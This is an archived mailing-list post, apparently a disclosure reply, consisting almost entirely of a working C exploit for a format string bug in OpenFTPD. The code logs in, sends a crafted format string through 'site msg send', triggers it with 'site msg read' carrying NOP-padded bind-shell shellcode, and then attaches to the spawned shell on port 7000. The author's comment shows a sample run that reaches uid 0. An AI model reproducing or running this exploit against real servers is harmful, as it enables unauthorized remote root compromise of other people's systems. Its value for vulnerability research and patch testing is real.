<<< Date Index >>>     <<< Thread Index >>>

EXPLOIT for Re: [VSA0402] OpenFTPD format string vulnerability



/*
 * shouts to mitakeet :D
 *
 * exploit for openftpd format string bug. tested on most current version only.
 *  -infamous42md AT hotpop DOT com is real email
 *
 * only tricky part is find a place to stick the shell, as there isn't enough
 * room to send it with the format string.  thankfully when using the 'site msg'
 * commands, all of the args to command are passed directly through to the msg
 * program. so when we tell ftpd to read messages with 'site msg read X', we
 * pass the shellcode as X.  the jumpslot for fclose() gets hijacked, and the
 * retaddr lies early in stack, it's argv[3].
 * no values are hardcoded into sploit, all come from command line, this works
 * for me on slack 9:
 *
 * [n00b@xxxxxxxxxxxxxxxx] ./openf -u root -p "" -l 0x0804d8b8 -r 0xbffff9d4 -h
 * localho -o 6969 -a 2 -b 18
 * connected to localho
 * Logged in as root
 * Exploit sent
 * connected to localho
 * got a shell
 *
 * id
 * uid=0(root) gid=0(root)
 * groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
 *
 *  - Connection closed by user
 *
 *  Usage: ./openf
 *          [ -u user ] [ -p pass ] [ -l retloc ] [ -r retaddr ]
 *          [ -b parms base ] [ -h host ] [ -o port ] [ -a align ]
 *  
 * */
#include <stdio.h>
#include <sys/types.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdlib.h>

#define SLOP 8
#define NOP 0x90
#define BS 0x1000
#define SBS 512
#define SHELL_PORT 7000
#define die(x) do{ perror(x); exit(1); }while(0)

typedef struct __args {
    char *user, *pass;
    char *host;
    u_short port;
    u_long retloc, retaddr;
    int parms_base; /* distance to the dummy param */
    int align;
} args;

/* call them shell code */
char sc[] =
    "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
    "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
    "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
    "\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
    "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
    "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
    "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

char *usage =
    "\t[ -u user ] [ -p pass ] [ -l retloc ] [ -r retaddr ]\n"
    "\t[ -b parms base ] [ -h host ] [ -o port ] [ -a align ]\n";

void parse_args(int argc, char **argv, args * argp)
{
    int c;

    while ((c = getopt(argc, argv, "a:u:p:l:r:b:h:o:")) != -1) {
        switch (c) {
        case 'a':
            if ((argp->align = atoi(optarg)) < 0 || argp->align > 3)
                goto pusage;
            break;
        case 'u':
            argp->user = optarg;
            break;
        case 'p':
            argp->pass = optarg;
            break;
        case 'l':
            sscanf(optarg, "%lx", &argp->retloc);
            break;
        case 'r':
            sscanf(optarg, "%lx", &argp->retaddr);
            break;
        case 'h':
            argp->host = optarg;
            break;
        case 'o':
            argp->port = atoi(optarg);
            break;
        case 'b':
            if ((argp->parms_base = atoi(optarg)) > 0)
                break;
            /*
             * fall thru 
             */
          pusage:
        case ':':
        case '?':
        default:
            fprintf(stderr, "Usage: %s\n%s", argv[0], usage);
            exit(1);
        }
    }
    if (optind != argc || !argp->user || !argp->pass || !argp->retloc ||
        !argp->retaddr || !argp->host || !argp->port || !argp->parms_base)
        goto pusage;
}

int conn(char *host, u_short port)
{
    int sock = 0;
    struct hostent *hp;
    struct sockaddr_in sa;

    memset(&sa, 0, sizeof(sa));

    hp = gethostbyname(host);
    if (hp == NULL) {
        herror("ghbn");
        die("bla");
    }
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr = **((struct in_addr **) hp->h_addr_list);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0)
        die("socket");

    if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
        die("connect");

    printf("connected to %s\n", host);
    return sock;
}

void login(char *user, char *pass, int sock)
{
    char ubuf[BS], pbuf[BS];

    snprintf(ubuf, BS - 1, "USER %s\r\n", user);
    ubuf[BS - 1] = 0;
    snprintf(pbuf, BS - 1, "PASS %s\r\n", pass);
    pbuf[BS - 1] = 0;

    sleep(1);
    if (send(sock, ubuf, strlen(ubuf), 0) < 0)
        die("send");
    sleep(1);
    if (send(sock, pbuf, strlen(pbuf), 0) < 0)
        die("send");
    sleep(1);
    printf("Logged in as %s\n", user);
}

void get_fmt(args * argp, char *fb)
{
    u_short high, low;
    ulong retloc = argp->retloc, slop = 0;
    int dummy = argp->parms_base, len = 0;

    /* bytes printed before us */
    slop = SLOP + argp->align;

    /* ret addr */
    low = (argp->retaddr & 0xffff);
    high = argp->retaddr >> 16;

    /* adjust ret addr words */
    if (low > high)
        high += (0x10000 - low);
    else if (high > low)
        high -= low;
    else if (high == low) {
        fprintf(stderr, "Can't encode a NULL high retaddr, bailing\n"
                "high = %hx\tlow = %hx\n", high, low);
        die("adsf");
    }

    low -= slop;

    /* align */
    memset(fb, 'A', argp->align);
    fb[argp->align] = 0;

    /* write code 
     * fmt look like: 
     * ALIGN-write_code-dummy-addr1-addr2-low_retaddr-high_retaddr
     */
    sprintf(fb,
            /*   retL         writeL    retH         writeH */
            "%s" "%%%d$*%d$u" "%%%d$hn" "%%%d$*%d$u" "%%%d$hn",
            fb, dummy, dummy + 3, dummy + 1, dummy, dummy + 4, dummy + 2);

    /* args */
    strcat(fb, "1111");         /* dummy */
    len = strlen(fb);
    *(u_int *) (fb + len) = retloc;     /* write 1 */
    len += sizeof(retloc);
    *(u_int *) (fb + len) = retloc + 2; /* write 2 */
    len += sizeof(retloc);
    *(u_short *) (fb + len) = low;      /* ret low */
    *(u_short *) (fb + len + 2) = 0x0101;       /* can't be 0 */
    len += sizeof(retloc);
    *(u_short *) (fb + len) = high;     /* ret high */
    *(u_short *) (fb + len + 2) = 0x0101;       /* can't be 0 */
    len += sizeof(retloc);

    fb[len] = 0;
}

void sploit(args * argp, int sock)
{
    char buf[BS], fmt[BS], sb[BS];

    /* setup shell buf */
    memset(sb, NOP, BS);
    strncpy(sb + 100, sc, BS - 101);
    sb[BS - 1] = 0;

    get_fmt(argp, fmt);

    /* slip them the poison */
    snprintf(buf, BS - 1, "site msg send %s %s\r\n", argp->user, fmt);
    buf[BS - 1] = 0;
    if (send(sock, buf, strlen(buf), 0) < 0)
        die("send");

    sleep(5);

    /* and make them eat it */
    snprintf(buf, BS - 1, "site msg read %s\r\n", sb);
    buf[BS - 1] = 0;
    if (send(sock, buf, strlen(buf), 0) < 0)
        die("send");

    printf("Exploit sent\n");
    sleep(1);
}

void shell(char *host, u_short port)
{
    int sock = 0, l = 0;
    char buf[BS];
    fd_set rfds;

    sock = conn(host, port);

    printf("got a shell\n\n");
    FD_ZERO(&rfds);

    while (1) {
        FD_SET(STDIN_FILENO, &rfds);
        FD_SET(sock, &rfds);

        if (select(sock + 1, &rfds, NULL, NULL, NULL) < 1)
            die("select");

        if (FD_ISSET(STDIN_FILENO, &rfds)) {
            if ((l = read(0, buf, BS)) <= 0)
                die("\n - Connection closed by user\n");
            if (write(sock, buf, l) < 1)
                die("write");
        }

        if (FD_ISSET(sock, &rfds)) {
            l = read(sock, buf, sizeof(buf));

            if (l == 0)
                die("\n - Connection terminated.\n");
            else if (l < 0)
                die("\n - Read failure\n");

            if (write(1, buf, l) < 1)
                die("write");
        }
    }
}

int main(int argc, char **argv)
{
    int sock = 0;
    args args;

    memset(&args, 0, sizeof(args));
    parse_args(argc, argv, &args);
    sock = conn(args.host, args.port);
    login(args.user, args.pass, sock);
    sploit(&args, sock);
    close(sock);
    sleep(20);
    shell(args.host, SHELL_PORT);

    return 0;
}
-- 
-sean